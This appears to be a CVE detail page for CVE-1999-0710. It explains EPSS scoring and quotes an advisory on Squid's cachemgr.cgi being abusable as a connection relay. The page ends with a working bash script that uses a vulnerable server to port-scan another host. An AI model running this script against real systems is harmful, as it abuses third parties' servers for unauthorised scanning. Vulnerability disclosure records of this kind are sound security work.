CVE-1999-0710 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

source: https://www.securityfocus.com/bid/2059/info The 'cachemgr.cgi' module is a management interface for the Squid proxy service. It was installed by default in '/cgi-bin' by Red Hat Linux 5.2 and 6.0 installed with Squid. This script prompts for a host and port, which it then tries to connect to. If a webserver such as Apache is running, this can be used to connect to arbitrary hosts and ports, allowing for potential use as an intermediary in denial-of-service attacks, proxied port scans, etc. Interpreting the output of the script can allow the attacker to determine whether or not a connection was established. #!/bin/bash -x # Port scanning using a misconfigured squid # using open apache # Usage miscachemgr host_vuln host_to_scan end_port # Concept: Jacobo Van Leeuwen & Francisco S�a Mu�oz # Coded by Francisco S�a Mu�oz # IP6 [Logic Control] PORT=1 ONE='/cgi-bin/cachemgr.cgi?host=' TWO='&port=' THREE='&user_name=&operation&auth=' mkdir from_$1_to_$2 while [ $PORT -lt $3 ]; do # lynx -dump http://$1/cgi-bin/cachemgr.cgi?host=\ # $2&port=$PORT&user_name=&operation=authenticate&auth= > \ # port_$1_to_$2/$PORT.log 2>&1 lynx -dump http://$1$ONE$2$TWO$PORT$THREE > from_$1_to_$2/$PORT.log 2>&1 let PORT=PORT+1 done